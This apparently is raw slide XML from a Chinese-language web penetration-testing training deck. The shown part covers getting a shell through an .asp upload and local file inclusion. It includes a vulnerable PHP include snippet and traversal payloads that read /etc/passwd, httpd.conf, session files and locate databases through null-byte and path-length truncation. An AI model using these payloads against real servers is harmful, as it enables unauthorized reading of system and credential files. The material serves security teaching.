                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>模块，然后修改上传文件格式后缀为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.asp</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GO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>发包上传获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑"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04</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="41300">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131"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文件包含</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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="1098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文件包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23554" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="981075"/>
            <a:ext cx="7747000" cy="1877437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>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文件包含漏洞的产生原因是在通过</a:t>
            </a:r>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的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Local File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）漏洞了。</a:t>
            </a:r>
          </a:p>
          <a:p>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、普通本地文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>包含</a:t>
            </a:r>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、有限制的本地文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>包含</a:t>
            </a:r>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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、普通远程文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23556" name="Picture 4" descr="24114524a98cd92fe19094b11f659717a53706bd"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="3213100"/>
            <a:ext cx="8207375" cy="3467100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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39750" y="981075"/>
            <a:ext cx="7272338" cy="4770537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>普通文件包含</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>&lt;?php include("inc/" . $_GET['file']); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>包含同目录下的文件：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>?file=.htaccess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>目录遍历：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../var/lib/locate.db ?file=../../../../../../../../../var/lib/mlocate/mlocate.db</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>中这两个文件储存着所有文件的路径，需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>权限） </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>目录或者其他配置文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>包含上传的附件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>?file=../attachment/media/xxx.file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>文件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>?file=../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>tmp/sess_tnrdo9ub2tsdurntv0pdir1no7</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24578" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="15557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普通文件包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑"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981075"/>
            <a:ext cx="7272338" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>有限制文件包含</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;?php include("inc/" . $_GET['file'] . ".htm"); ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>截断：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../etc/passwd%00</a:t>
            </a:r>
          </a:p>
          <a:p>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需要 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>magic_quotes_gpc=off</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小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5.3.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>有效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>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%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>截断目录遍历：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../var/www/%00</a:t>
            </a:r>
          </a:p>
          <a:p>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需要 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>magic_quotes_gpc=off</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unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件系统，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>FreeBSD</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OpenBSD</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NetBSD</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Solaris)</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路径长度截断：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.</a:t>
            </a:r>
          </a:p>
          <a:p>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版本小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5.2.8(?)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可以成功，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>需要文件名长于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4096</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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>需要长于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>256)</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点号截断：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>?file=../../../../../../../../../boot.ini/………[…]…………</a:t>
            </a:r>
          </a:p>
          <a:p>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版本小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5.2.8(?)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可以成功，只适用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，点号需要长于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="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26627" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="17843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有限制文件包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑"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05</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="41300">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155"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信息泄露</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576388" y="188913"/>
            <a:ext cx="6019800" cy="6386512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="41300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="41300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243"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木桶原理</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49" y="836613"/>
            <a:ext cx="8064599" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>信息泄露包括：源码泄露、账号密码泄露、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SVN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>信息泄露、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>信息泄露、日志信息泄露</a:t>
            </a:r>
          </a:p>
          <a:p>
